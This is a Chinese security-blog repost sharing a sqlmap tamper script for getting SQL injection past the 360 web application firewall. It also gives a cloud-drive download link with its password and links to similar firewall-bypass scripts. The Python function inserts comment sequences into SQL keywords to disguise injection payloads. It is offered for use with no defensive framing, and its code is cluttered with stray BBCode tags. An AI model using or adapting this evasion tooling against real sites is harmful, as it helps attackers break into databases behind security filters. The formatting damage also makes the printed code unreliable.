资源分享

Sqlmap过360注入脚本一枚

字号+ 作者:Sinyer 来源:转载 2016-11-25 10:24 我要评论( )

#!/usr/bin/env python[/color][/size][/b] [b][size=3][color=#ff0000] Copyright (c) 2006-2016 sqlmap developers ([url=http://sqlmap.org/]http://sqlmap.org......

#!/usr/bin/env python[/color][/size][/b]
[b][size=3][color=#ff0000]"""
Copyright (c) 2006-2016 sqlmap developers ([url=http://sqlmap.org/]http://sqlmap.org/[/url])
See the file 'doc/COPYING' for copying permission
"""[/color][/size][/b]
[b][size=3][color=#ff0000]import re[/color][/size][/b]
[b][size=3][color=#ff0000]from lib.core.common import randomRange
from lib.core.data import kb
from lib.core.enums import PRIORITY[/color][/size][/b]
[b][size=3][color=#ff0000]__priority__ = PRIORITY.LOW[/color][/size][/b]
[b][size=3][color=#ff0000]def tamper(payload, **kwargs):
    """
    Add random comments to SQL keywords[/color][/size][/b]
[b][size=3][color=#ff0000]    >>> import random
    >>> random.seed(0)
    >>> tamper('INSERT')
    'I/**/N/**/SERT'
    """[/color][/size][/b]
[b][size=3][color=#ff0000]    retVal = payload[/color][/size][/b]
[b][size=3][color=#ff0000]    if payload:
        for match in re.finditer(r"\b[A-Za-z_]+\b", payload):
            word = match.group()[/color][/size][/b]
[b][size=3][color=#ff0000]            if len(word) < 2:
                continue[/color][/size][/b]
[b][size=3][color=#ff0000]            if word.upper() in kb.keywords:
                _ = word[0][/color][/size][/b]
[b][size=3][color=#ff0000]                for i in xrange(1, len(word) - 1):
                    _ += "%s%s" % ("/*/#\*" if randomRange(0, 1) else "", word[i])[/color][/size][/b]
[b][size=3][color=#ff0000]                _ += word[-1][/color][/size][/b]
[b][size=3][color=#ff0000]                if "/**/" not in _:
                    index = randomRange(1, len(word) - 1)
                    _ = word[:index] + "/*/#\*" + word[index:][/color][/size][/b]
[b][size=3][color=#ff0000]                retVal = retVal.replace(word, _)[/color][/size][/b]
[b][size=3][color=#ff0000]    return retVal[/color][/size][/b]
[b][size=3][color=#ff0000]



链接: http://pan.baidu.com/s/1kVHeVvL 密码: vphh



本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/Share/277.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
  • Sqlmap过狗过云锁注入脚本一枚

    Sqlmap过狗过云锁注入脚本一枚

    2016-11-25 10:28

  • 利用php进行命令注入攻击演练

    利用php进行命令注入攻击演练

    2016-11-25 09:26

  • OWASP TOP10的安全威胁SQL注射(SQL Injection)

    OWASP TOP10的安全威胁SQL注射(SQL Injection)

    2016-11-25 08:59

网友点评
暂时未开启评论功能~